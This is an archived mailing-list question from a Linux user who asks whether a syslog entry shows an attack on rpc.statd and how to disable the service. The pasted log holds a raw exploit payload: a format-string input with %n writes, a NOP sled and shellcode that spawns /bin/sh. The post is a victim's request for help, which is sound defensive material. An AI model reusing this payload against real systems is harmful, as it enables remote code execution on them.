[Date Prev][Date Next] [Thread Prev][Thread Next] [Date Index] [Thread Index]

rpc.statd hacking but firewalled



The following showed up in my syslog the other day.... Is this possbile
hacking?

What port is rpc.statd on?
What does it do?
What will break if it is turned off? and how to turn it off?
Only a few, selected ports, are listened on.  The last rule in my
firewall script is ipchains -l -A input -i eth0 -j DENY.

thank you.

  ------------------------------------------------------------------------

Mar 11 17:55:25 hostname /sbin/rpc.statd[156]: gethostbyname error for
^X<F7><FF>
<BF>^X<F7><FF><BF>^Y<F7><FF><BF>^Y<F7><FF><BF>^Z<F7><FF><BF>^Z<F7><FF><BF>^[<F7>

<FF><BF>^[<F7><FF><BF>%8x%8x%8x%8x%8x%8x%8x%8x%8x%236x%n%137x%n%10x%n%192x%n\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220

\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220\220
Mar 11 17:55:25 hostname
<C7>^F/bin<C7>F^D/shA0<C0>\210F^G\211v^L\215V^P\215N^L\21
1<F3><B0>^K<CD>\200<B0>^A<CD>\200<E8>\177<FF><FF><FF>



Reply to: